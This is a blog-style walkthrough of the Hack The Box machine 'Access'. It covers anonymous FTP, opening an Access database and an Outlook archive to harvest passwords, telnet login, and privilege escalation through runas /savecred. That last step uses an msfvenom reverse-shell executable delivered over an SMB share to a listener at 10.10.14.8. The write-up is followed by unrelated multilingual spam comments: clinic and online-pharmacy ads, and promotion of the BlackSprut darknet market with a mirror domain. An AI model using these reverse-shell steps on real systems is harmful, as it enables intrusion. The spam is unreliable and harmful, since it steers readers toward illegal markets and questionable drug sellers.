Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
Per the usual, we’ll start with our standard nMap scan: nmap -A -p – 10.10.10.98
So port 80 is open, let’s check out the webpage:
Nothing too exciting. I also see that port 21 is open with Anonymous FTP login, so let’s try that: ftp 10.10.10.98
Navigating to the Backups directory, there is a backup.mdb file, so let’s get that: get backup.mdb
There is also a Access Control.zip file in the Engineer directory, so let’s get that too: get “Access Control.zip”
And then we notice something interesting when we transfer the files. They both present a WARNING! error that the files were received in ASCII mode. This could be problematic (and was) when I tried to open the files because they displayed as corrupted. We can type binary in our FTP window to switch our transfer mode to binary.
It looks like .mdb is a Microsoft Access database. I ran the command apt search mdb to see what packages I could potentially install that might let me view a mdb file and saw mdbtools, so I installed that with apt-get install mdbtools.
Now, when we do mdb-tables backup.mdb we can see the tables within this database:
I’m gonna go an easy route right now and use the website www.mdbopener.com. Obviously if this was a potentially sensitive database we wouldn’t want to do this. However, since this is HTB, I’m ok with it. When we open our database we see a bunch of information in a much easier to view format:
When we look at the auth user table, we can see three entries:
Cool! I also know that when I tried to open up the .zip file downloaded earlier it’s password protected. Let’s try some of these credentials:
The GUI extractor was being dumb so I tried the command line one: 7z x “Access Control.zip” and entered access4u@security as the password.
And we’re presented with a .pst file, which is an Outlook e-mail archive/profile. I had to install pst-utils first with apt-get install pst-utils After installation, I was able to run the command readpst ‘Access Controls.pst’ and was presented with the mailbox itself.
We can then use cat to view the contents of the mailbox, and we’re presnted with a username and a password:
Shell
We can use Telnet to get into the box easily enough:
Once on the machine I ran systeminfo and saved the associated data in a new file on my Kali box:
From here, we’ll use Windows Exploit Suggester to see if there’s any vulnerabilities that stand out. First I’ll navigate to where I have WES saved and then we’ll update the database: ./windows-exploit-suggester.py –update
Next, we’ll compare this newly updated database with the systeminfo file from our target machine: ./windows-exploit-suggester.py –database 2020-08-25-mssb.xls –systeminfo ../../Access/systeminfo.txt
Looking at these, there are some critical vulnerabilities but nothing for remote code execution, priv esc, etc. So let’s move forward.
After moving to C:\Users\Public\Desktop there is a .lnk file stored here. So let’s type it:
There are two commands in here worth investigating: runas and savecred:
RunAs allows a user to run a command as another user, and /savecred saves the password so that it only has to be entered the first time RunAs is used. From dummies.com:
Now, we could use RunAs to view the root flag, but that’s no fun. Let’s create a reverse shell. Let’s use msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe > shell.exe
If you need a refresher or a cheat sheet, I found this handy one: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
Next, we need to get our shell.exe over to our target machine. To do this we’ll setup our Impacket SMBServer: impacket-smbserver smb smb (don’t forget to be in the directory above the directory you want to share.
Next, from our Telnet/Shell we want to add this SMB share as an accessible location from our Windows box: net use \\10.10.14.8\smb
Now let’s copy over our shell: copy \\10.10.14.8\smb\shell.exe
Access Denied….which means I can’t write to the directory I’m in. So let’s move to C:\temp and try again:
Now we can use our RunAs command in conjunction with savecred: runas /user:Access\Administrator /savecred “C:\temp\shell.exe” But first we need to start our NetCat listener to catch our reverse shell:
And then run our command:
tzzlw8
Современная клиника предоставляет широкий спектр медицинских услуг для взрослых и детей.
Команда профессионалов работают по международным стандартам и работают на новейшей аппаратуре.
В клинике созданы безопасная и уютная атмосфера для восстановления здоровья.
Клиника предоставляет гибкие программы лечения для всех обратившихся.
Мы заботимся о здоровью наших пациентов.
Наши пациенты могут ожидать качественное лечение без очередей и лишнего стресса.
https://currency.clinicalpsychologistme.com/the-grandness-of-fluid-selling-services-3708165761740586974
vibración de motor
Equipos de equilibrado: esencial para el funcionamiento estable y óptimo de las maquinarias.
En el entorno de la tecnología actual, donde la eficiencia y la estabilidad del sistema son de máxima significancia, los aparatos de equilibrado tienen un tarea esencial. Estos aparatos especializados están creados para balancear y regular partes móviles, ya sea en dispositivos manufacturera, vehículos de movilidad o incluso en aparatos de uso diario.
Para los técnicos en mantenimiento de aparatos y los especialistas, utilizar con dispositivos de ajuste es crucial para asegurar el operación estable y seguro de cualquier mecanismo rotativo. Gracias a estas soluciones avanzadas innovadoras, es posible minimizar notablemente las vibraciones, el estruendo y la presión sobre los cojinetes, mejorando la duración de partes caros.
Igualmente significativo es el papel que juegan los dispositivos de equilibrado en la atención al consumidor. El ayuda profesional y el reparación permanente empleando estos sistemas habilitan brindar prestaciones de alta estándar, incrementando la bienestar de los consumidores.
Para los titulares de emprendimientos, la aporte en sistemas de calibración y sensores puede ser fundamental para aumentar la productividad y rendimiento de sus dispositivos. Esto es particularmente relevante para los dueños de negocios que gestionan medianas y medianas emprendimientos, donde cada elemento es relevante.
Asimismo, los equipos de balanceo tienen una extensa aplicación en el campo de la prevención y el monitoreo de calidad. Permiten detectar posibles errores, evitando mantenimientos caras y daños a los sistemas. También, los información generados de estos sistemas pueden emplearse para mejorar procesos y potenciar la reconocimiento en buscadores de búsqueda.
Las áreas de aplicación de los equipos de ajuste abarcan variadas áreas, desde la manufactura de ciclos hasta el control ecológico. No interesa si se trata de importantes elaboraciones manufactureras o limitados locales domésticos, los sistemas de calibración son esenciales para proteger un operación óptimo y sin riesgo de detenciones.
На территории Российской Федерации сертификация играет важную роль для подтверждения соответствия продукции установленным стандартам. Прохождение сертификации нужно как для бизнеса, так и для конечных пользователей. Наличие сертификата подтверждает, что продукция прошла все необходимые проверки. Особенно это актуально в таких отраслях, как пищевая промышленность, строительство и медицина. Прошедшие сертификацию компании чаще выбираются потребителями. Кроме того, сертификация может быть необходима для участия в тендерах и заключении договоров. В итоге, соблюдение сертификационных требований обеспечивает стабильность и успех компании.
обязательная сертификация
I really appreciate this post. I¦ve been looking everywhere for this! Thank goodness I found it on Bing. You have made my day! Thanks again
Здесь вы найдете центр психологического здоровья, которая предлагает профессиональную помощь для людей, страдающих от стресса и других ментальных расстройств. Наша индивидуальный подход для восстановления ментального здоровья. Наши опытные психологи готовы помочь вам решить трудности и вернуться к психологическому благополучию. Профессионализм наших врачей подтверждена множеством положительных обратной связи. Запишитесь с нами уже сегодня, чтобы начать путь к лучшей жизни.
http://jaredhorowitz.us/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fl%2Flamotridzhin%2F
На этом ресурсе вы найдете клинику психологического здоровья, которая обеспечивает профессиональную помощь для людей, страдающих от депрессии и других ментальных расстройств. Эта эффективные методы для восстановления ментального здоровья. Наши специалисты готовы помочь вам справиться с трудности и вернуться к сбалансированной жизни. Профессионализм наших психологов подтверждена множеством положительных обратной связи. Запишитесь с нами уже сегодня, чтобы начать путь к лучшей жизни.
http://lemonlawprotector.net/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fz%2Fzopiklon%2F
На этом сайте вы найдете центр психологического здоровья, которая предоставляет психологические услуги для людей, страдающих от тревоги и других ментальных расстройств. Мы предлагаем индивидуальный подход для восстановления психического здоровья. Наши опытные психологи готовы помочь вам справиться с психологические барьеры и вернуться к гармонии. Квалификация наших врачей подтверждена множеством положительных отзывов. Свяжитесь с нами уже сегодня, чтобы начать путь к лучшей жизни.
http://lifloorscape.com/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Farticles%2Fgemofobiya-boyazn-vida-krovi%2F
I really appreciate this post. I have been looking everywhere for this! Thank goodness I found it on Bing. You have made my day! Thx again
Даркнет — это скрытая область сети, куда открывается доступ с использованием защищенные браузеры, например, через I2P.
Здесь размещаются как легальные, а также нелегальные сайты, среди которых магазины и прочие платформы.
Одной из таких платформ была Блэк Спрут, данный ресурс специализировалась на продаже различных товаров, среди которых противозаконные товары.
bs2best at
Такие сайты довольно часто функционируют на криптовалюту для обеспечения анонимности операций.
Тем не менее, власти регулярно блокируют основные нелегальные рынки, однако вскоре появляются новые торговые точки.
You can find a vast selection of certified medicines for different conditions.
Our online pharmacy provides fast and safe shipping right to your door.
Each medication is supplied by licensed manufacturers so you get effectiveness and reliability.
You can browse our catalog and place your order in minutes.
Got any concerns? Customer service are here to help whenever you need.
Stay healthy with affordable e-pharmacy!
https://bresdel.com/blogs/795114/Viagra-Oral-Jelly-Side-Effects-Real-Stories-and-Practical-Management
Regardless of the popularity of smartwatches, traditional timepieces remain iconic.
Collectors and watch lovers admire the artistry that defines traditional timepieces.
In contrast to smartwatches, which need frequent upgrades, mechanical watches stay relevant through generations.
https://manacube.com/threads/luxury-time-hold-value.96780/
Prestigious watchmakers continue to release new traditional watches, showing that their appeal remains strong.
For true enthusiasts, an automatic timepiece is not just a way to tell time, but a symbol of timeless elegance.
While smartwatches offer convenience, traditional timepieces have soul that remains unmatched.
You can find a wide range of certified medicines for different conditions.
Our online pharmacy ensures fast and safe shipping to your location.
Every item is supplied by certified pharmaceutical companies to ensure authenticity and compliance.
Easily explore our catalog and get your medicines with just a few clicks.
Need help? Our support team will guide you whenever you need.
Take care of yourself with reliable online pharmacy!
https://www.storeboard.com/blogs/health/cenforce-150-mg-a-high-dose-solution-for-men-seeking-effective-ed-treatment/6071428
Обзор BlackSprut: ключевые особенности
BlackSprut удостаивается обсуждения широкой аудитории. Почему о нем говорят?
Данный ресурс предлагает интересные опции для аудитории. Визуальная составляющая сайта характеризуется удобством, что позволяет ей быть интуитивно удобной даже для тех, кто впервые сталкивается с подобными сервисами.
Необходимо помнить, что этот ресурс имеет свои особенности, которые формируют его имидж в своей нише.
При рассмотрении BlackSprut важно учитывать, что определенная аудитория оценивают его по-разному. Многие выделяют его возможности, другие же относятся к нему неоднозначно.
Подводя итоги, BlackSprut остается предметом обсуждений и вызывает интерес широкой аудитории.
Где найти работающий доступ на БлэкСпрут?
Хотите узнать свежее зеркало на БлэкСпрут? Мы поможем.
bs2best at
Сайт может меняться, поэтому важно иметь актуальный домен.
Мы следим за изменениями чтобы предоставить актуальным линком.
Посмотрите актуальную ссылку у нас!
Мы занимается помощью приезжих в Санкт-Петербурге.
Мы помогаем в оформлении документов, прописки, а также вопросах, касающихся работы.
Наши специалисты разъясняют по вопросам законодательства и дают советы оптимальные варианты.
Оказываем поддержку как с временным пребыванием, и в вопросах натурализации.
Благодаря нам, вы сможете быстрее адаптироваться, решить все юридические формальности и уверенно чувствовать себя в северной столице.
Пишите нам, чтобы узнать больше!
https://spb-migrant.ru/